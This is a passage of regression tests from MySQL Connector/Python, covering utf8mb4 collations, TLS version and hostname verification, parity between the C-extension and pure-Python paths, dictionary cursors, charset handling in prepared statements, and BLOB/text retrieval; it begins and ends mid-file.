config["collation"] = "utf8mb4_general_ci"
self.tbl = "BugOra24659561"
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.execute("CREATE TABLE {0} (id INT, name VARCHAR(100))"
"".format(self.tbl))
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
def test_executemany_utf8mb4(self):
self.cur.executemany(
"INSERT INTO {0} VALUES (%s, %s)".format(self.tbl),
[(1, "Nuno"), (2, "Amitabh"), (3, "Rafael")]
)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class BugOra27991948(tests.MySQLConnectorTests):
"""BUG#27991948: UNREAD_RESULT IS NOT UNSET AFTER INVOKE GET_ROWS ON C-EXT
"""
test_sql_single_result = "show variables like '%port%'"
cnx_cext = None
cnx_cext_raw = None
def setUp(self):
config_cext = tests.get_mysql_config()
config_cext["use_pure"] = False
self.cnx_cext = mysql.connector.connect(**config_cext)
def tearDown(self):
self.cnx_cext.close()
def test_automatically_set_of_unread_rows(self):
"""Test unread_rows is automatically set after fetchall()"""
# Get all the rows and then execute a query without invoking free_result
self.cnx_cext.cmd_query(self.test_sql_single_result)
unread_result = self.cnx_cext.unread_result
self.assertTrue(unread_result, "unread_rows is expected to be True")
_ = self.cnx_cext.get_rows()
unread_result = self.cnx_cext.unread_result
self.assertFalse(unread_result, "unread_rows was not set to False")
# Query execution must not raise InternalError: Unread result found
self.cnx_cext.cmd_query(self.test_sql_single_result)
_ = self.cnx_cext.get_rows()
# Test cursor fetchall
cur_cext = self.cnx_cext.cursor()
cur_cext.execute(self.test_sql_single_result)
unread_result = self.cnx_cext.unread_result
self.assertTrue(unread_result, "unread_rows is expected to be True")
_ = cur_cext.fetchall()
unread_result = self.cnx_cext.unread_result
self.assertFalse(unread_result, "unread_rows was not set to False")
# Query execution must not raise InternalError: Unread result found
cur_cext.execute(self.test_sql_single_result)
_ = cur_cext.fetchall()
cur_cext.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 1),
"Collation utf8mb4_0900_ai_ci not available on 5.7.x")
class BugOra27277964(tests.MySQLConnectorTests):
"""BUG#27277964: NEW UTF8MB4 COLLATIONS NOT SUPPORTED
"""
def setUp(self):
config = tests.get_mysql_config()
config["charset"] = "utf8mb4"
config["collation"] = "utf8mb4_0900_ai_ci"
self.tbl = "BugOra27277964"
self.cnx = connection.MySQLConnection(**config)
self.cur = self.cnx.cursor()
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.execute("CREATE TABLE {0} (id INT, name VARCHAR(100))"
"".format(self.tbl))
def tearDown(self):
self.cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cur.close()
def test_execute_utf8mb4_collation(self):
self.cur.execute("INSERT INTO {0} VALUES (1, 'Nuno')".format(self.tbl))
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 11),
"Not support for TLSv1.2 or not available by default")
class Bug26484601(tests.MySQLConnectorTests):
"""UNABLE TO CONNECT TO A MYSQL SERVER USING TLSV1.2"""
def try_connect(self, tls_version, expected_ssl_version):
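# Connect requesting the given TLS version(s) and compare the
# server-reported ssl_version with the expected value: either an
# exact version string or a (major, minor) tuple meaning "this
# version or newer".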
config = tests.get_mysql_config().copy()
config['tls_versions'] = tls_version
config['ssl_ca'] = ''
cnx = connection.MySQLConnection(**config)
query = "SHOW STATUS LIKE 'ssl_version%'"
cur = cnx.cursor()
cur.execute(query)
res = cur.fetchall()
if isinstance(expected_ssl_version, tuple):
msg = ("Not using the expected or greater TLS version: {}, instead"
" the connection used: {}.")
# Get the version as tuple
server_tls = tuple([int(d) for d in
(res[0][1].split('v')[1].split("."))])
self.assertGreaterEqual(server_tls, expected_ssl_version,
msg.format(expected_ssl_version, res))
else:
msg = ("Not using the expected TLS version: {}, instead the "
"connection used: {}.")
self.assertEqual(res[0][1], expected_ssl_version,
msg.format(expected_ssl_version, res))
def test_get_connection_using_given_TLS_version(self):
"""Test connect using the given TLS version
The system variable tls_version determines which protocols the
server is permitted to use from those that are available (note#3).
+---------------+-----------------------+
| Variable_name | Value |
+---------------+-----------------------+
| tls_version | TLSv1,TLSv1.1,TLSv1.2 |
+---------------+-----------------------+
To restrict and permit only connections with a specific version, the
variable can be set with those specific versions that will be allowed,
changing the configuration file.
[mysqld]
tls_version=TLSv1.1,TLSv1.2
This test takes advantage of the fact that the connector can request
a specific TLS version, and verifies that the connector can connect
to the server using that version. This avoids changing the server
configuration, which would require stopping and restarting the server
and increase the time needed to run the test. In addition, the test
relies on the default value of the 'tls_version' variable being
'TLSv1,TLSv1.1,TLSv1.2' (note#2).
In this test a connection is attempted while forcing a specific TLS
version (all of them must succeed), and the test then verifies that
the connection was made with the given TLS version by checking the
ssl.version() method (note#3).
Notes:
1.- tls_version is only available on MySQL 5.7+
2.- 5.6.39 does not support TLSv1.2, so the test is skipped there.
Currently 5.7.21 uses the default values TLSv1,TLSv1.1,TLSv1.2, the
same as 8.0.11+. This test only runs on those versions and above.
3.- The ssl.version() method returns the TLS version used during the
connection; the version returned by ssl.cipher() is not correct on
Windows, as it only indicates the newest supported version.
"""
test_tls_versions = check_tls_versions_support(["TLSv1.1", "TLSv1.2"])
if not test_tls_versions:
self.fail("No TLS version to test: {}".format(test_tls_versions))
for tls_v_name in test_tls_versions:
self.try_connect([tls_v_name], tls_v_name)
def test_get_connection_using_servers_TLS_version(self):
"""Test connect using the servers default TLS version
The TLS version used during the secured connection is chosen by the
server at the time the ssl handshake is made if the connector does not
specifies any specific version to use. The default value of the
ssl_version is None, however this only mean to the connector that none
specific version will be chosen by the server when the ssl handshake
occurs.
"""
# The default value for the connector 'ssl_version' is None
# For the expected version, the server will use the latest version of
# TLS available "TLSv1.2" or newer.
tls_version = None
self.try_connect(tls_version, (1, 2))
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class BugOra27650437(tests.MySQLConnectorTests):
"""BUG#27650437: DIFFERENCES PYTHON AND C-EXT FOR GET_ROW()/GET_ROWS()
"""
test_sql_single_result = "show variables like '%port%'"
cnx_pure = None
cnx_cext = None
cnx_pure_raw = None
cnx_cext_raw = None
def setUp(self):
config_pure = tests.get_mysql_config()
config_pure["use_pure"] = True
self.cnx_pure = mysql.connector.connect(**config_pure)
config_cext = tests.get_mysql_config()
config_cext["use_pure"] = False
self.cnx_cext = mysql.connector.connect(**config_cext)
config_pure_raw = tests.get_mysql_config()
config_pure_raw["use_pure"] = True
config_pure_raw["raw"] = True
self.cnx_pure_raw = mysql.connector.connect(**config_pure_raw)
config_cext_raw = tests.get_mysql_config()
config_cext_raw["use_pure"] = False
config_cext_raw["raw"] = True
self.cnx_cext_raw = mysql.connector.connect(**config_cext_raw)
def tearDown(self):
self.cnx_pure.close()
self.cnx_cext.close()
self.cnx_pure_raw.close()
self.cnx_cext_raw.close()
def test_get_row(self):
"""Test result from get_row is the same in pure and using c-ext"""
self.cnx_pure.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure.get_row()
self.cnx_cext.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext.get_row()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
def test_get_rows(self):
"""Test results from get_rows are the same in pure and using c-ext"""
self.cnx_pure.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure.get_rows()
self.cnx_cext.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext.get_rows()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
def test_get_row_raw(self):
"""Test result from get_row is the same in pure and using c-ext"""
self.cnx_pure_raw.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure_raw.get_row()
self.cnx_cext_raw.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext_raw.get_row()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
def test_get_rows_raw(self):
"""Test results from get_rows are the same in pure and using c-ext"""
self.cnx_pure_raw.cmd_query(self.test_sql_single_result)
res_pure = self.cnx_pure_raw.get_rows()
self.cnx_cext_raw.cmd_query(self.test_sql_single_result)
res_cext = self.cnx_cext_raw.get_rows()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
def _test_fetchone(self, cur_pure, cur_cext):
"""Test result from fetchone is the same in pure and using c-ext"""
cur_pure.execute(self.test_sql_single_result)
res_pure = cur_pure.fetchone()
_ = cur_pure.fetchall()
cur_cext.execute(self.test_sql_single_result)
res_cext = cur_cext.fetchone()
_ = cur_cext.fetchall()
self.cnx_cext.free_result()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
def _test_fetchmany(self, cur_pure, cur_cext):
"""Test results from fetchmany are the same in pure and using c-ext"""
cur_pure.execute(self.test_sql_single_result)
res_pure = cur_pure.fetchmany()
cur_cext.execute(self.test_sql_single_result)
res_cext = cur_cext.fetchmany()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
res_pure = cur_pure.fetchmany(2)
res_cext = cur_cext.fetchmany(2)
_ = cur_pure.fetchall()
_ = cur_cext.fetchall()
self.cnx_cext.free_result()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
def _test_fetch_fetchall(self, cur_pure, cur_cext):
"""Test results from fetchall are the same in pure and using c-ext"""
cur_pure.execute(self.test_sql_single_result)
res_pure = cur_pure.fetchall()
cur_cext.execute(self.test_sql_single_result)
res_cext = cur_cext.fetchall()
self.cnx_cext.free_result()
self.assertEqual(res_pure, res_cext, "Result using pure: {} differs "
"from c-ext result {}".format(res_pure, res_cext))
def test_cursor(self):
"""Test results from cursor are the same in pure and using c-ext"""
cur_pure = self.cnx_pure.cursor()
cur_cext = self.cnx_cext.cursor()
self._test_fetchone(cur_pure, cur_cext)
self._test_fetchmany(cur_pure, cur_cext)
self._test_fetch_fetchall(cur_pure, cur_cext)
cur_pure.close()
cur_cext.close()
def test_cursor_raw(self):
"""Test results from cursor raw are the same in pure and using c-ext"""
raw = True
cur_pure_raw = self.cnx_pure.cursor(raw=raw)
cur_cext_raw = self.cnx_cext.cursor(raw=raw)
self._test_fetchone(cur_pure_raw, cur_cext_raw)
self._test_fetchmany(cur_pure_raw, cur_cext_raw)
self._test_fetch_fetchall(cur_pure_raw, cur_cext_raw)
cur_pure_raw.close()
cur_cext_raw.close()
def test_cursor_buffered(self):
"""Test results from cursor buffered are the same in pure or c-ext"""
buffered = True
cur_pure_buffered = self.cnx_pure.cursor(buffered=buffered)
cur_cext_buffered = self.cnx_cext.cursor(buffered=buffered)
self._test_fetchone(cur_pure_buffered, cur_cext_buffered)
self._test_fetchmany(cur_pure_buffered, cur_cext_buffered)
self._test_fetch_fetchall(cur_pure_buffered, cur_cext_buffered)
cur_pure_buffered.close()
cur_cext_buffered.close()
def test_cursor_dictionary(self):
"""Test results from cursor buffered are the same in pure or c-ext"""
cur_pure_dictionary = self.cnx_pure.cursor(dictionary=True)
cur_cext_dictionary = self.cnx_cext.cursor(dictionary=True)
self._test_fetchone(cur_pure_dictionary, cur_cext_dictionary)
self._test_fetchmany(cur_pure_dictionary, cur_cext_dictionary)
self._test_fetch_fetchall(cur_pure_dictionary, cur_cext_dictionary)
cur_pure_dictionary.close()
cur_cext_dictionary.close()
def test_cursor_dictionary_buf(self):
"""Test results from cursor buffered are the same in pure or c-ext"""
cur_pure = self.cnx_pure.cursor(dictionary=True,
buffered=True)
cur_cext = self.cnx_cext.cursor(dictionary=True,
buffered=True)
self._test_fetchone(cur_pure, cur_cext)
self._test_fetchmany(cur_pure, cur_cext)
self._test_fetch_fetchall(cur_pure, cur_cext)
cur_pure.close()
cur_cext.close()
class BugOra28239074(tests.MySQLConnectorTests):
"""BUG#28239074: CURSOR DICTIONARY DOES NOT RETURN DICTIONARY TYPE RESULTS
"""
table = "bug28239074"
def setUp(self):
config_pure = tests.get_mysql_config()
config_pure["use_pure"] = True
self.cnx = mysql.connector.connect(**config_pure)
cur = self.cnx.cursor(dictionary=True)
cur.execute("DROP TABLE IF EXISTS {0}".format(self.table))
cur.execute("CREATE TABLE {0}(a char(50) ,b int) "
"DEFAULT CHARSET utf8".format(self.table))
data = [(chr(1), 1),('s', 2),(chr(120), 3),(chr(121), 4),(chr(127), 5)]
cur.executemany("INSERT INTO {0} (a, b) VALUES "
"(%s, %s)".format(self.table), data)
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {}".format(self.table))
self.cnx.close()
def test_cursor_dict(self):
exp = [
{u'a': u'\x01', u'b': 1},
{u'a': u's', u'b': 2},
{u'a': u'\x78', u'b': 3},
{u'a': u'\x79', u'b': 4},
{u'a': u'\x7f', u'b': 5}
]
cur = self.cnx.cursor(dictionary=True)
# Test fetchone
cur.execute("SELECT * FROM {}".format(self.table))
i = 0
row = cur.fetchone()
while row is not None:
self.assertTrue(isinstance(row, dict))
self.assertEqual(exp[i], row, "row {} is not equal to expected row"
" {}".format(row, exp[i]))
row = cur.fetchone()
i += 1
# Test fetchall
cur.execute("SELECT * FROM {}".format(self.table))
rows = cur.fetchall()
self.assertEqual(exp, rows, "rows {} are not equal to the expected rows {}".format(rows, exp))
# Test for each in cursor
cur.execute("SELECT * FROM {}".format(self.table))
i = 0
for row in cur:
self.assertTrue(isinstance(row, dict))
self.assertEqual(exp[i], row, "row {} is not equal to expected row"
" {}".format(row, exp[i]))
i += 1
class BugOra27364914(tests.MySQLConnectorTests):
"""BUG#27364914: CURSOR PREPARED STATEMENTS DO NOT CONVERT STRINGS
"""
charsets_list = ('gbk', 'sjis', 'big5', 'utf8', 'utf8mb4', 'latin1')
def setUp(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cur = cnx.cursor(cursor_class=cursor.MySQLCursorPrepared)
for charset in self.charsets_list:
tablename = '{0}_ps_test'.format(charset)
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
table = (
"CREATE TABLE {table} ("
" id INT AUTO_INCREMENT KEY,"
" c1 VARCHAR(40),"
" val2 datetime"
") CHARACTER SET '{charset}'"
).format(table=tablename, charset=charset)
cur.execute(table)
cnx.commit()
cur.close()
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
for charset in self.charsets_list:
tablename = '{0}_ps_test'.format(charset)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(tablename))
cnx.close()
def _test_charset(self, charset, data):
config = tests.get_mysql_config()
config['charset'] = charset
config['use_unicode'] = True
self.cnx = connection.MySQLConnection(**config)
cur = self.cnx.cursor(cursor_class=cursor.MySQLCursorPrepared)
tablename = '{0}_ps_test'.format(charset)
cur.execute("TRUNCATE {0}".format(tablename))
self.cnx.commit()
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
for value in data:
cur.execute(insert, (value,))
self.cnx.commit()
cur.execute("SELECT id, c1 FROM {0} ORDER BY id".format(tablename))
for row in cur.fetchall():
self.assertTrue(isinstance(row[1], STRING_TYPES),
"The value is expected to be a string")
self.assertEqual(data[row[0] - 1], row[1])
cur.close()
self.cnx.close()
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_gbk(self):
self._test_charset('gbk', [u'赵孟頫', u'赵\孟\頫\\', u'遜'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_sjis(self):
self._test_charset('sjis', ['\u005c'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_big5(self):
self._test_charset('big5', ['\u5C62'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_utf8mb4(self):
self._test_charset('utf8mb4', ['\u5C62'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_utf8(self):
self._test_charset('utf8', [u'データベース', u'데이터베이스'])
@foreach_cnx()
def test_cursor_prepared_statement_with_charset_latin1(self):
self._test_charset('latin1', [u'ñ', u'Ñ'])
class BugOra27802700(tests.MySQLConnectorTests):
"""BUG#27802700: A BYTEARRAY IS RETURNED FROM USING get_rows METHOD
"""
table_name = "BugOra27802700"
insert_stmt = u"INSERT INTO {} ({}) values ({{value}})"
def setUp(self):
config = tests.get_mysql_config()
config['charset'] = "utf8"
config['use_unicode'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
cur.execute("CREATE TABLE IF NOT EXISTS {} ("
" id INT(11) UNSIGNED AUTO_INCREMENT UNIQUE KEY,"
" int_long INT,"
" time TIME,"
" date DATE,"
" datetime DATETIME,"
" var_char VARCHAR(50),"
" long_blob LONGBLOB,"
" str TEXT) CHARACTER SET utf8"
" COLLATE utf8_general_ci".format(self.table_name))
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
try:
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
except:
pass
def run_test_retrieve_stored_type(self, stm, test_values, expected_values,
column, expected_type):
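# Insert every test value, read the column back through
# cnx.get_rows(), and check that both the returned Python value and
# its type match the expectations.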
config = tests.get_mysql_config()
config['charset'] = "utf8"
config['use_unicode'] = True
config['autocommit'] = True
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
for test_value in test_values:
cnx.cmd_query(stm.format(value=test_value))
qry = "SELECT {column} FROM {table} ORDER BY id"
cur.execute(qry.format(column=column, table=self.table_name))
rows = cnx.get_rows()[0][len(test_values) * (-1):]
for returned_val, expected_value in zip(rows, expected_values):
self.assertEqual(returned_val[0], expected_value)
self.assertTrue(isinstance(returned_val[0], expected_type))
cur.close()
cnx.close()
@foreach_cnx()
def test_retrieve_stored_int_long(self):
column = "int_long"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["-12345", "0", "12345"]
expected_values = [-12345, 0, 12345]
if PY2:
expected_type = (int, long)
else:
expected_type = (int)
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_str(self):
column = "str"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ['\' \'', '\'some text\'', u'\'データベース\'',
'\'"12345"\'']
expected_values = [' ', 'some text', u'データベース', '"12345"']
expected_type = STRING_TYPES
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_blob(self):
column = "long_blob"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ['\' \'', '\'some text\'', u'\'データベース\'',
"\"'12345'\""]
expected_values = [b' ', b'some text', b'\xe3\x83\x87\xe3\x83\xbc\xe3'
b'\x82\xbf\xe3\x83\x99\xe3\x83\xbc\xe3\x82\xb9'
if PY2 else u'データベース'.encode("utf-8"),
b"'12345'"]
expected_type = bytes
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_varchar(self):
column = "var_char"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ['\' \'', '\'some text\'', u'\'データベース\'',
"'12345'"]
expected_values = [' ', 'some text', u'データベース', "12345"]
expected_type = STRING_TYPES
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_datetime_types(self):
column = "datetime"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["cast('1972-01-01 00:42:49.000000' as DATETIME)",
"cast('2018-01-01 23:59:59.000000' as DATETIME)"]
expected_values = [datetime(1972, 1, 1, 0, 42, 49),
datetime(2018, 1, 1, 23, 59, 59)]
expected_type = datetime
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_date_types(self):
column = "date"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["DATE('1972-01-01')",
"DATE('2018-12-31')"]
expected_values = [date(1972, 1, 1),
date(2018, 12, 31)]
expected_type = date
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
@foreach_cnx()
def test_retrieve_stored_time_types(self):
column = "time"
stm = self.insert_stmt.format(self.table_name, column)
test_values = ["TIME('00:42:49.00000')",
"TIME('23:59:59.00000')"]
expected_values = [timedelta(hours=0, minutes=42, seconds=49),
timedelta(hours=23, minutes=59, seconds=59)]
expected_type = timedelta
self.run_test_retrieve_stored_type(stm, test_values, expected_values,
column, expected_type)
class BugOra27277937(tests.MySQLConnectorTests):
"""BUG#27277937: CONFUSING ERROR MESSAGE WHEN SPECIFYING UNSUPPORTED
COLLATION
"""
def setUp(self):
pass
def test_invalid_collation(self):
config = tests.get_mysql_config()
config["charset"] = "utf8"
config["collation"] = "foobar"
self.cnx = connection.MySQLConnection()
try:
self.cnx.connect(**config)
except errors.ProgrammingError as err:
self.assertEqual(err.msg, "Collation 'foobar' unknown.")
else:
self.fail("A ProgrammingError was expected")
def tearDown(self):
pass
class BugOra28188883(tests.MySQLConnectorTests):
"""BUG#27277937: DEPRECATED UTF8 IS THE DEFAULT CHARACTER SET IN 8.0
"""
def setUp(self):
# Remove charset from the connection configuration if it is set, so
# the default charset 'utf8mb4' is used for each connection
self.config = tests.get_mysql_config().copy()
if "charset" in self.config:
del self.config["charset"]
@foreach_cnx()
def test_utf8mb4_default_charset(self):
self.assertEqual(self.cnx.charset, "utf8mb4")
data = [(1, u'🐬'), (2, u'🐍'), (3, u'🐶')]
tbl = "BugOra28188883"
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.execute("CREATE TABLE {0} (id INT, name VARCHAR(100)) "
"DEFAULT CHARSET utf8mb4".format(tbl))
stmt = "INSERT INTO {0} (id, name) VALUES (%s, %s)".format(tbl)
cur.executemany(stmt, data)
cur.execute("SELECT id, name FROM {0}".format(tbl))
self.assertEqual(data, cur.fetchall())
cur.execute("DROP TABLE IF EXISTS {0}".format(tbl))
cur.close()
self.cnx.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 23),
"MySQL 5.7.23+ is required for VERIFY_IDENTITY")
@unittest.skipIf(sys.version_info < (2, 7, 9),
"Python 2.7.9+ is required for SSL")
class BugOra27434751(tests.MySQLConnectorTests):
"""BUG#27434751: MYSQL.CONNECTOR HAS NO TLS/SSL OPTION TO VERIFY SERVER NAME
"""
def setUp(self):
ssl_ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
ssl_cert = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_cert.pem'))
ssl_key = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_client_key.pem'))
self.config = tests.get_mysql_config()
self.config.pop("unix_socket")
self.config["ssl_ca"] = ssl_ca
self.config["ssl_cert"] = ssl_cert
self.config["ssl_key"] = ssl_key
self.config["ssl_verify_cert"] = True
def _verify_server_name_cnx(self, use_pure=True):
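# When ssl_verify_identity is True the host name must match the
# server certificate, so connecting through 127.0.0.1 must fail
# while 'localhost' must succeed.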
config = self.config.copy()
config["use_pure"] = use_pure
# Setting an invalid host name against a server certificate
config["host"] = "127.0.0.1"
# Should connect with ssl_verify_identity=False
config["ssl_verify_identity"] = False
cnx = mysql.connector.connect(**config)
cnx.close()
# Should fail to connect with ssl_verify_identity=True
config["ssl_verify_identity"] = True
self.assertRaises(errors.InterfaceError, mysql.connector.connect,
**config)
# Should connect with the correct host name and ssl_verify_identity=True
config["host"] = "localhost"
cnx = mysql.connector.connect(**config)
cnx.close()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_verify_server_name_cext_cnx(self):
self._verify_server_name_cnx(use_pure=False)
def test_verify_server_name_pure_cnx(self):
self._verify_server_name_cnx(use_pure=True)
@unittest.skipIf(CMySQLConnection, "Test only available without C Extension")
class BugOra27794178(tests.MySQLConnectorTests):
"""BUG#27794178: USING USE_PURE=FALSE SHOULD RAISE AN ERROR WHEN CEXT IS NOT
AVAILABLE
"""
def test_connection_use_pure(self):
config = tests.get_mysql_config().copy()
if "use_pure" in config:
del config["use_pure"]
cnx = mysql.connector.connect(**config)
cnx.close()
# Force using C Extension should fail if not available
config["use_pure"] = False
self.assertRaises(ImportError, mysql.connector.connect, **config)
class Bug27897881(tests.MySQLConnectorTests):
"""BUG#27897881: Fix typo in BLOB data conversion
"""
def setUp(self):
self.config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**self.config)
cursor = cnx.cursor()
self.tbl = 'Bug27897881'
cursor.execute("DROP TABLE IF EXISTS %s" % self.tbl)
create = ('CREATE TABLE {0}(col1 INT NOT NULL, col2 LONGBLOB, '
'PRIMARY KEY(col1))'.format(self.tbl))
cursor.execute(create)
cursor.close()
cnx.close()
def tearDown(self):
cnx = connection.MySQLConnection(**self.config)
cursor = cnx.cursor()
cursor.execute("DROP TABLE IF EXISTS {}".format(self.tbl))
cursor.close()
cnx.close()
@foreach_cnx()
def test_retrieve_from_LONGBLOB(self):
cnx_config = self.config.copy()
cnx_config['charset'] = "utf8"
cnx_config['use_unicode'] = True
cnx = connection.MySQLConnection(**cnx_config)
cur = cnx.cursor()
# An empty blob produced an index error.
# "12345" handled as a datetime in JSON produced an index error.
# LONGBLOB can store big data
test_values = ["", "12345", '"54321"', "A"*(2**20)]
expected_values = [b"", b"12345", b'"54321"', b"A"*(2**20)]
stm = "INSERT INTO {} (col1, col2) VALUES ('{}', '{}')"
for num, test_value in zip(range(len(test_values)), test_values):
cur.execute(stm.format(self.tbl, num, test_value))
stm = "SELECT * FROM {} WHERE col1 like '{}'"
for num, expected_value in zip(range(len(test_values)), expected_values):
cur.execute(stm.format(self.tbl, num))
row = cur.fetchall()[0]
self.assertEqual(row[1], expected_value, "value {} is not "
"the expected {}".format(row[1], expected_value))
cur.close()
cnx.close()
class BugOra29324966(tests.MySQLConnectorTests):
"""BUG#29324966: ADD MISSING USERNAME CONNECTION ARGUMENT FOR DRIVER
COMPATIBILITY.
"""
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_connection_args_compatibility(self):
config = self.config.copy()
config["username"] = config["user"]
config["passwd"] = config["password"]
config["db"] = config["database"]
config["connect_timeout"] = config["connection_timeout"]
config.pop("user")
config.pop("password")
config.pop("database")
config.pop("connection_timeout")
cnx = self.cnx.__class__(**config)
cnx.close()
class Bug20811567(tests.MySQLConnectorTests):
"""BUG#20811567: Support use_pure option in config files.
"""
def write_config_file(self, use_pure, test_file):
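# Write a temporary option file containing a [connector_python]
# section with the connection settings plus the use_pure flag.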
temp_cnf_file = os.path.join(os.getcwd(), test_file)
with open(temp_cnf_file, "w") as cnf_file:
config = tests.get_mysql_config()
config["use_pure"] = use_pure
cnf = "[connector_python]\n"
cnf += "\n".join(["{0} = {1}".format(key, value)
for key, value in config.items()])
cnf_file.write(cnf)
@foreach_cnx()
def test_support_use_pure_option_in_config_files(self):
if self.cnx.__class__ == CMySQLConnection:
temp_cnf_file = "temp_cnf_file_not_pure.cnf"
use_pure = False
else:
temp_cnf_file = "temp_cnf_file_use_pure.cnf"
use_pure = True
# Prepare config file.
self.write_config_file(use_pure, temp_cnf_file)
# Get connection
with mysql.connector.connect(option_files=temp_cnf_file) as cnx:
self.assertEqual(self.cnx.__class__, cnx.__class__)
# Remove config file
os.remove(temp_cnf_file)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 17),
"MySQL 8.0.17+ is required for utf8mb4_0900_bin collation")
class BugOra29855733(tests.MySQLConnectorTests):
"""BUG#29855733: ERROR DURING THE CLASSIC CONNECTION WITH CHARSET AND
COLLATION SPECIFIED.
"""
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_connection_collation_utf8mb4_0900_bin(self):
config = self.config.copy()
config["username"] = config["user"]
config["passwd"] = config["password"]
config["charset"] = "utf8mb4"
config["collation"] = "utf8mb4_0900_bin"
cnx = self.cnx.__class__(**config)
cnx.close()
@unittest.skipIf(tests.MYSQL_VERSION <= (5, 7, 2),
"Pool not supported with with MySQL version 5.6")
class BugOra25349794(tests.MySQLConnectorTests):
"""BUG#25349794: ADD READ_DEFAULT_FILE ARGUMENT FOR CONNECT().
"""
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_read_default_file_alias(self):
opt_file = os.path.join("tests", "data", "option_files", "pool.cnf")
config = tests.get_mysql_config()
if tests.MYSQL_VERSION < (5, 7):
config["client_flags"] = [-constants.ClientFlag.CONNECT_ARGS]
conn = mysql.connector.connect(read_default_file=opt_file,
option_groups=["pooling"], **config)
self.assertEqual("my_pool", conn.pool_name)
mysql.connector._CONNECTION_POOLS = {}
conn.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 8), "No JSON support")
class BugOra29808262(tests.MySQLConnectorTests):
"""BUG#229808262: TEXT COLUMN WITH ONLY DIGITS READS IN AS INT.
"""
table_name = "BugOra29808262"
def setUp(self):
pass
def tearDown(self):
pass
@foreach_cnx()
def test_blob_fields(self):
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
cur.execute("CREATE TABLE {} ("
" my_blob BLOB,"
" my_longblob LONGBLOB,"
" my_json JSON,"
" my_text TEXT) CHARACTER SET utf8"
" COLLATE utf8_general_ci".format(self.table_name))
test_values = (
"BLOB" * (2**10),
"LONG_BLOB" * (2**20),
'{"lat": "41.14961", "lon": "-8.61099", "name": "Porto"}',
"My TEXT",
)
expected_values = (
b"BLOB" * (2**10),
b"LONG_BLOB" * (2**20),
'{"lat": "41.14961", "lon": "-8.61099", "name": "Porto"}',
"My TEXT",
)
cur = self.cnx.cursor()
cur.execute("INSERT INTO {} VALUES ('{}')"
